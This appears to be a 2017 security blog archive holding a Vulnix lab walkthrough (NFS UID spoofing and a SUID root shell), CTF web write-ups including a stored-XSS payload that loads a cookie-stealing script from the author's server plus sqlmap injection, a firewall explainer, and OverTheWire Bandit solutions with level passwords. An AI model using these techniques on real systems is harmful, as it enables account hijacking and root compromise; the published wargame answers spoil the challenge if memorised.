Saturday, July 29, 2017

Exploitation Testing – Vulnix

Knock knock!! Who's there?? - No one!!
Let me come in through the back door.

Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions

The goal: boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish – excluding the actual hacking of the vmdk.

1. Finding the victim machine's (Vulnix VM) IP address.
root@kali:~# netdiscover -r 192.168.43.0/24  




2. A full TCP port scan of the victim host. (-T5 is fast but can drop ports on a lossy link; fall back to -T4 if the results look incomplete.)
root@kali:~# nmap -sT -p- -Pn -n -v 192.168.43.33 -T5





3. Enumerating users on the victim host through SMTP VRFY: the server answers 250/252 for accounts that exist and 550 for those that do not.
root@kali:~# smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.43.33





4. Running finger against the usernames we found.





5. Since NFS is running on port 2049, we may be able to mount an exported share and find some data.





The share mounts, but its contents cannot be read: the export has root_squash set, so our client-side root (uid 0) is mapped to the anonymous user on the server and has no rights over the vulnix-owned files.


6. Brute-forcing SSH to find the password for the account named "user".


With the recovered password we log in as user over SSH.




7. Finding the UID of the vulnix account and creating a temporary local user with the same UID on our own machine. NFS with the default AUTH_SYS security trusts the client's numeric UID, so anything that local user writes through the share is owned by vulnix on the server.




8. Generate an SSH key pair so we can log in to the server as vulnix without a password.



As the temporary local user, copy the generated public key into /home/vulnix/.ssh/authorized_keys through the NFS mount; because the UIDs match, the file ends up owned by vulnix with the permissions sshd expects.




9. Log in to the victim's machine as 'vulnix' using the key.





10. sudo allows vulnix to edit /etc/exports without typing a password.




Replace the root_squash flag on the export with no_root_squash. As vulnix we cannot re-export the filesystem ourselves, so reboot the VM manually from its console for the new export options to take effect.



Once the machine has rebooted, mount the share again. With no_root_squash our client-side root is now root on the share as well.
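Everything in steps 5 and 10 hinges on one export option, root_squash versus no_root_squash. The script below is an added example and not part of this write-up: it audits an /etc/exports file for client entries that set no_root_squash and emits a hardened copy. The function names are mine, and the exports content written by write_sample_exports is constructed for the demo.

```sh
#!/bin/sh
# Added example (not from the Vulnix write-up): audit /etc/exports for the
# no_root_squash misconfiguration the walkthrough introduces in step 10.

# write_sample_exports FILE
# Writes a constructed exports file modelled on the share in the walkthrough.
write_sample_exports() {
    cat > "$1" <<'EOF'
# constructed sample, modelled on the share in the walkthrough
/home/vulnix 192.168.43.0/24(rw,root_squash)
/srv/backup *(rw,sync,no_root_squash)
EOF
}

# audit_exports FILE
# Prints "RISK <path> <client(options)>" for every client entry that sets
# no_root_squash, i.e. where uid 0 on the NFS client stays uid 0 on the share.
audit_exports() {
    # drop comment lines, then split each export into its path and client list
    grep -v '^[[:space:]]*#' "$1" | (
        set -f   # no pathname expansion: a client spec such as *(rw) must stay literal
        while read -r path clients; do
            [ -z "$path" ] && continue
            for client in $clients; do
                case "$client" in
                    *no_root_squash*) printf 'RISK %s %s\n' "$path" "$client" ;;
                esac
            done
        done
    )
}

# harden_exports FILE
# Writes FILE to stdout with every no_root_squash replaced by root_squash
# (the default, which maps client root to the anonymous uid). Apply the result
# with "exportfs -ra"; with root on the server no reboot is needed.
harden_exports() {
    sed 's/no_root_squash/root_squash/g' "$1"
}

# Usage:
#   f=$(mktemp); write_sample_exports "$f"; audit_exports "$f"; harden_exports "$f"
```

audit_exports only looks at the literal option string; an export that omits root_squash entirely still squashes root, because that is the server default, so absence of the option is not flagged.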




11. Once mounted, copy the victim's shell binary into the share, change its owner to root and set the SUID bit. Because root_squash is now off, the chown to uid 0 is honoured by the server.
On my local machine, as 'root':


  
On the victim's machine, run the SUID copy. If the copied shell is bash, start it with -p, since bash drops setuid privileges otherwise:





Misconfigurations like these are common on old or carelessly administered systems. On a modern, well-configured OS this route is much harder and often not possible at all. This is just one way you can break in.





Friday, July 28, 2017

Web Penetration Testing - Reveal Flags

Web Penetration Testing 1 – Club Status

Turn on Intercept in Burp Suite and browse to the web site. In the captured GET request there are two cookies, PHPSESSID and vip. Change the vip cookie value from 0 to 1 and forward the request.


The page now shows the Blog link. Clicking it reveals the flag for this challenge.

  
Web Penetration Testing 2 – Om nom nom nom


After completing challenge 1, we can browse the Blog page. There is a user called Sycamore, and Sycamore's blog has a comment box that accepts our comments. The next step is to test that comment box for vulnerabilities.

Type <script>alert("xss")</script> in the comment box and submit it. The alert fires.


That's it: the comment field is vulnerable to stored XSS. The next step is to steal Sycamore's PHPSESSID cookie. To do that we host a server of our own: create a file named file.j containing JavaScript that sends the visitor's document.cookie to our server, and serve it with Python's SimpleHTTPServer on port 80.

Now we create an XSS payload for the comment field that loads that script from our server. It looks like this:

<script src=//<IP>/file.j></script>

Post this as a comment on the blog and wait. After a short while, entries like these appear in the Python server's log as Sycamore's browser fetches the script and reports back.


From those entries we get Sycamore's cookie value. Setting that PHPSESSID in our own browser and loading the page reveals the flag.




Web Penetration Testing 3 – Nonce-sense

After looking around the site while logged in as Sycamore, we notice that users can delete comments. The delete request carries a CSRF token that changes on every request, which stops automated tools from replaying payloads. Burp handles this with session handling rules and macros.
We set up a new session handling rule, record a macro that fetches a fresh CSRF token, and use it to update the token in each request.




We need to add a custom parameter for the CSRF token.





We need to specify which request parameter the macro should update.






We need to define the scope of the session.



Then go to Repeater and press Go. Each press sends a request with a different, valid CSRF token.


Appending a single quote to the comment_id value changes the response, which indicates a SQL injection vulnerability.


Save the raw request to a file named "deletecomment_file".


Now we let sqlmap do the rest, feeding it the saved request with -r and routing it through the Burp proxy so the session handling rule keeps the CSRF token fresh.



sqlmap finds 5 tables in the cysca database. We dump the "flag" table.



Finally, we can reveal the flag.




Tuesday, July 25, 2017

What Is a Firewall?

We have all heard about firewalls at some point. What are they used for? Do they stop viruses?
There is a good chance you are using one right now: if you run a modern OS there is one built in, and otherwise your security suite will include one.
But what is the firewall for? Keep reading for reasons why you need it.

What Is a Firewall?

Let's start with what a firewall actually is. There are no sparks, flames or fuel of any kind involved.
A firewall is a barrier intended to protect your PC, phone or tablet from network-based threats on the Internet.
While you use the Internet, data is exchanged between your computer and servers and routers elsewhere, and the firewall's job is to inspect this traffic (sent in packets) and decide what is allowed through.
It does this by checking each packet against the rules that have been configured, such as addresses, ports, protocols and connection state. Depending on those rules, packets are accepted or rejected.
Most operating systems (desktop and mobile) have a basic built-in firewall, but a dedicated firewall application gives more control. Here are 5 reasons why you should use a firewall.

1. A Firewall Can Protect Your Computer From Unauthorized Remote Access

One of the worst things that can happen to a computer user is someone taking control of the machine remotely. Watching your own mouse move around the screen as an intruder rummages through your personal data is petrifying.
With a well-configured firewall (and a modern OS) inbound remote desktop access is blocked, preventing attackers from taking charge of your computer.

2. Firewalls Can Block Messages Linking to Unwanted Content

There are still people running very old versions of Windows, such as Windows XP. Worse, some run it without any firewall at all, and on XP releases before Service Pack 2 the built-in firewall was not even enabled by default.
You read that right. The Internet carries a lot of malware looking for unprotected PCs. Your ISP may filter some of it, but you cannot rely on that in the long run.

3. Firewalls Make Online Gaming Safer

Online gaming is one of the most significant developments in the history of video games, and it is also a potential security risk. Much malware has been written to target online gamers through insecure or compromised game servers.

4. You Can Block Unsuitable Content With a Firewall

So far we have talked mainly about blocking hackers and other remote-access threats such as malware, but firewalls can do more than that. Besides blocking inbound threats, firewall applications also let you block particular online locations.

5. Firewalls Can Be Hardware or Software

As we said above, firewalls do not have to be software only. Hardware firewalls are found in most homes, built into the router. You can reach them with the router's administrative credentials, and once signed in you can review the options and change them if necessary.
Hope you like this article, please comment your opinion below.

Monday, July 24, 2017

WarGames - OverTheWire




Bandit Level 0 -> 1




Recently I have been obsessed with a wargaming site called overthewire.org. At the time of writing I have made it through a few of the servers already, but I will post my solutions to the entry-level server they offer, "Bandit". This is also the recommended place to start if you are new to the site. You should already be familiar with basic Linux commands before attempting this wargame; the first page of Bandit explains what to do if you don't know a command. You do need a bit of your own intuition to make it from one level to the next.
I have been through a good handful of wargaming sites in the past and I find this one to be of good quality, with an interesting variety of servers to play. For those who don't know, a wargame in hacking is a security challenge in which you must exploit a vulnerability in a system or application, or otherwise gain access to a computer system. Most of the servers here are about program exploitation on the Linux platform. You do not have to be on a Linux system to play, but if you have access to a Linux box, a real terminal is the way to go. PuTTY is the way to go on Windows. But I digress: use my posted solutions to learn and understand the levels, or compare them with your own. Enjoy!
Level 0:
We simply ssh to bandit0@bandit.labs.overthewire.org using the password bandit0 and we are in our shell.
Level 0 -> 1:
Once in, we see a readme file in our home directory. Simply cat it and grab the password for level 1.
bandit0@melissa:~$ ls
readme
bandit0@melissa:~$ cat readme
boJ9jbbUNNfktd78OOpsqOltutMc3MY1
Level 1-> 2:
We are told that the password is in a file called "-". A leading dash is parsed as an option, so we refer to the file by path (./-) instead to read it.
bandit1@melissa:~$ ls
-
bandit1@melissa:~$ cat ./-
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
Level 2 ->3:
This time we simply need to read a file with spaces in its name. Let's surround the file name with quotes.
bandit2@melissa:~$ ls
spaces in this filename
bandit2@melissa:~$ cat "spaces in this filename"
UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK
Level 3->4:
We are told the file we need is in a hidden file in the inhere directory.
bandit3@melissa:~$ ls
inhere
bandit3@melissa:~$ cd inhere
bandit3@melissa:~/inhere$ ls -la
total 12
drwxr-xr-x 2 root    root    4096 2012-05-10 23:51 .
drwxr-xr-x 3 root    root    4096 2012-05-10 23:51 ..
-rw-r----- 1 bandit4 bandit3   33 2012-05-10 23:51 .hidden
bandit3@melissa:~/inhere$ cat .hidden
pIwrPrtPN36QITSp3EQaw936yaFoFgAB
Level 4 ->5:
We are told the password is somewhere in the inhere directory and is the only human readable file in the directory. Let’s see what file types we have.
bandit4@melissa:~$ ls
inhere
bandit4@melissa:~$ cd inhere
bandit4@melissa:~/inhere$ ls -la
total 48
drwxr-xr-x 2 root    root    4096 2012-05-10 23:51 .
drwxr-xr-x 3 root    root    4096 2012-05-10 23:51 ..
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file00
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file01
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file02
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file03
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file04
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file05
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file06
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file07
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file08
-rw-r----- 1 bandit5 bandit4   33 2012-05-10 23:51 -file09
bandit4@melissa:~/inhere$ file ./-*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@melissa:~/inhere$ cat ./-file07
koReBOKuIDDepwhWk7jZC0RTdopnAYKh
Level 5-> 6:
This is similar to the previous, except we have some more file attributes to look for. As well as more files to look through.
bandit5@melissa:~$ ls
inhere
bandit5@melissa:~$ cd inhere
bandit5@melissa:~/inhere$ ls -la
total 88
drwxr-x--- 22 root bandit5 4096 2012-05-10 23:51 .
drwxr-xr-x  3 root root    4096 2012-05-10 23:51 ..
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere00
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere01
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere02
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere03
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere04
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere05
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere06
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere07
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere08
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere09
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere10
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere11
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere12
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere13
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere14
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere15
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere16
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere17
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere18
drwxr-x---  2 root bandit5 4096 2012-05-10 23:51 maybehere19
bandit5@melissa:~/inhere$ find ./ -size 1033c
./maybehere07/.file2
bandit5@melissa:~/inhere$ cat ./maybehere07/.file2
DXjZPULLxYr17uwoI01bNLQbtFemEgo7
Level 6->7:
The file can be anywhere on the server, but we are given its attributes (owner, group and size). This is a job for find. The 2>/dev/null at the end discards the permission-denied errors from directories we cannot read, leaving only the matches.
bandit6@melissa:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null
/var/lib/dpkg/info/bandit7.password
bandit6@melissa:~$ cat /var/lib/dpkg/info/bandit7.password
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs
Level 7->8:
The password for the next level is stored in the file data.txt next to the word millionth. We can pipe cat to grep for this.
bandit7@melissa:~$ ls
data.txt
bandit7@melissa:~$ cat data.txt | grep millionth
millionth       cvX2JJa4CFALtqS87jk27qwqGhBM9plV
Level 8->9:
Here we need to find the one line that occurs only once among many repeated ones. We can pipe a few commands together to do this. The order matters: uniq only collapses adjacent duplicates, so the input must be sorted first, and -u prints only the lines that appear exactly once.
bandit8@melissa:~$ ls
data.txt
bandit8@melissa:~$ cat data.txt | sort | uniq -u
UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR
Level 9->10:
The password for the next level is stored in the file data.txt among a few lines of human-readable strings starting with '=' characters. strings pulls the printable runs out of the binary file and grep narrows them down.
bandit9@melissa:~$ ls
data.txt
bandit9@melissa:~$ strings data.txt | grep '='
========== the
R=ev2,
NF=!^
M5Q=
========== password
TuI@=
========== iss
c       =$
w=RO
eD=p
jR=JlB
G========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk
:=*1p
KA=%
We can see our password string amongst our output.
Level 10->11:
The password for the next level is stored in the file data.txt, which contains base64 encoded data. We need to decode the file.
bandit10@melissa:~$ ls
data.txt
bandit10@melissa:~$ base64 -d data.txt
The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR
Level 11->12:
The password is encoded with ROT13, a simple letter substitution rather than real encryption. There are many ways to solve this, including various scripting languages or an online ROT13 decoder. Let's try a solution in our shell using tr.
bandit11@melissa:~$ ls
data.txt
bandit11@melissa:~$ cat data.txt | tr a-zA-Z n-za-mN-ZA-M
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
That command is given on the Wikipedia page for ROT13.
Level 12->13:
The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it is necessary to create a directory under /tmp in which you can work using mkdir. We need to decompress and check the file over and over again until we get the right format.
bandit12@melissa:~$ ls
data.txt
bandit12@melissa:~$ file data.txt
data.txt: ASCII text
bandit12@melissa:~$ mkdir /tmp/stw
bandit12@melissa:~$ cd /tmp/stw
bandit12@melissa:/tmp/stw$ xxd -r ~/data.txt > data.txt
bandit12@melissa:/tmp/stw$ file data.txt
data.txt: gzip compressed data, was "data2.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression
bandit12@melissa:/tmp/stw$ zcat data.txt > dataNew
bandit12@melissa:/tmp/stw$ ls
dataNew  data.txt
bandit12@melissa:/tmp/stw$ file dataNew
dataNew: bzip2 compressed data, block size = 900k
bandit12@melissa:/tmp/stw$ bzip2 -d dataNew
bzip2: Can't guess original name for dataNew -- using dataNew.out
bandit12@melissa:/tmp/stw$ ls
dataNew.out  data.txt
bandit12@melissa:/tmp/stw$ file dataNew.out
dataNew.out: gzip compressed data, was "data4.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression
bandit12@melissa:/tmp/stw$ zcat dataNew.out > evenNewer
bandit12@melissa:/tmp/stw$ ls
dataNew.out  data.txt  evenNewer
bandit12@melissa:/tmp/stw$ file evenNewer
evenNewer: POSIX tar archive (GNU)
bandit12@melissa:/tmp/stw$ tar -xvf evenNewer
data5.bin
bandit12@melissa:/tmp/stw$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@melissa:/tmp/stw$ tar -xvf data5.bin
data6.bin
bandit12@melissa:/tmp/stw$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@melissa:/tmp/stw$ bzip2 -d data6.bin
bzip2: Can't guess original name for data6.bin -- using data6.bin.out
bandit12@melissa:/tmp/stw$ ls
data5.bin  data6.bin.out  dataNew.out  data.txt  evenNewer
bandit12@melissa:/tmp/stw$ file data6.bin.out
data6.bin.out: POSIX tar archive (GNU)
bandit12@melissa:/tmp/stw$ tar -xvf data6.bin.out
data8.bin
bandit12@melissa:/tmp/stw$ file data8.bin
data8.bin: gzip compressed data, was "data9.bin", from Unix, last modified: Thu May 10 23:52:05 2012, max compression
bandit12@melissa:/tmp/stw$ zcat data8.bin > lost
bandit12@melissa:/tmp/stw$ ls
data5.bin  data6.bin.out  data8.bin  dataNew.out  data.txt  evenNewer  lost
bandit12@melissa:/tmp/stw$ file lost
lost: ASCII English text
bandit12@melissa:/tmp/stw$ cat lost
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL
At last, we have our password.
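The transcript above is the same check-decompress-check cycle run by hand nine times. As an added example that is not part of the original post, the script below automates it: it reads each layer's magic bytes instead of calling file, peels gzip, bzip2 and tar layers in whatever order they occur, and stops at the first plain file. It starts from the binary produced by xxd -r (as on the page) and assumes each tar archive holds exactly one member, as in this level. The function names are mine and the nested sample built by make_sample is constructed for the demo.

```sh
#!/bin/sh
# Added example (not from the OverTheWire write-up): generalise Level 12->13 into
# a loop that strips gzip / bzip2 / tar wrappers until a plain file remains.

# magic FILE -> first three bytes as lowercase hex, e.g. "1f8b08" for gzip
magic() {
    head -c 3 "$1" | od -An -tx1 | tr -d ' \n'
}

# tar has no leading magic: ustar/GNU archives carry "ustar" at byte offset 257
is_tar() {
    [ "$(tail -c +258 "$1" | head -c 5)" = "ustar" ]
}

# unwrap FILE -> prints the path of the innermost, plain file
unwrap() {
    work=$(mktemp -d)
    cur="$work/layer0"
    cp "$1" "$cur"
    n=0
    while :; do
        n=$((n + 1))
        next="$work/layer$n"
        case "$(magic "$cur")" in
            1f8b*)  gzip -dc "$cur" > "$next" ;;     # gzip:  1f 8b
            425a68) bzip2 -dc "$cur" > "$next" ;;    # bzip2: "BZh"
            *)
                if is_tar "$cur"; then
                    mkdir "$work/x$n"
                    tar -xf "$cur" -C "$work/x$n"
                    # assumption: each archive holds exactly one member, as in Bandit
                    next=$(find "$work/x$n" -type f | head -n 1)
                else
                    printf '%s\n' "$cur"   # no known wrapper left: this is the payload
                    return 0
                fi ;;
        esac
        cur=$next
    done
}

# make_sample DIR -> builds DIR/data.bin = gzip(tar(gzip(text))) and prints its path;
# constructed test data, not the real Bandit file
make_sample() {
    printf 'The password is EXAMPLEonly\n' > "$1/data9.bin"
    gzip -c "$1/data9.bin" > "$1/data8.bin"
    tar -cf "$1/data7.bin" -C "$1" data8.bin
    gzip -c "$1/data7.bin" > "$1/data.bin"
    printf '%s\n' "$1/data.bin"
}

# Usage (after "xxd -r data.txt > data.bin" on the real file):
#   cat "$(unwrap data.bin)"
# or, on the constructed sample:
#   cat "$(unwrap "$(make_sample "$(mktemp -d)")")"
```

Checking magic bytes is what file does internally for these formats; the gain here is that the loop needs no human in the middle, and every intermediate layer is kept under the temporary directory for inspection if something unexpected turns up.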
Level 13->14:
This one switches things up a little. The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level you do not get the next password; instead you get a private SSH key that logs you in as bandit14, and from that shell you read the password file.
bandit13@melissa:~$ ls
sshkey.private
bandit13@melissa:~$ ssh -i sshkey.private bandit14@localhost
Could not create directory '/home/bandit13/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
RSA key fingerprint is 9d:09:d9:46:84:df:f9:dd:cc:7c:dc:49:a0:95:b2:10.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit13/.ssh/known_hosts).
bandit14@melissa:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
And just like that, we are dumped into bandit14’s shell.
Level 14->15:
The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost. Here we have a lesson in telnet. Basically, we will use telnet to connect to localhost on port 30000 and enter the password while we are still in bandit14’s shell.
bandit14@melissa:~$ telnet localhost 30000
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr
 
Connection closed by foreign host.
Level 15->16:



When I see the words "free trial," I know I'm probably going to have to whip out my credit card and enter in the number to &qu...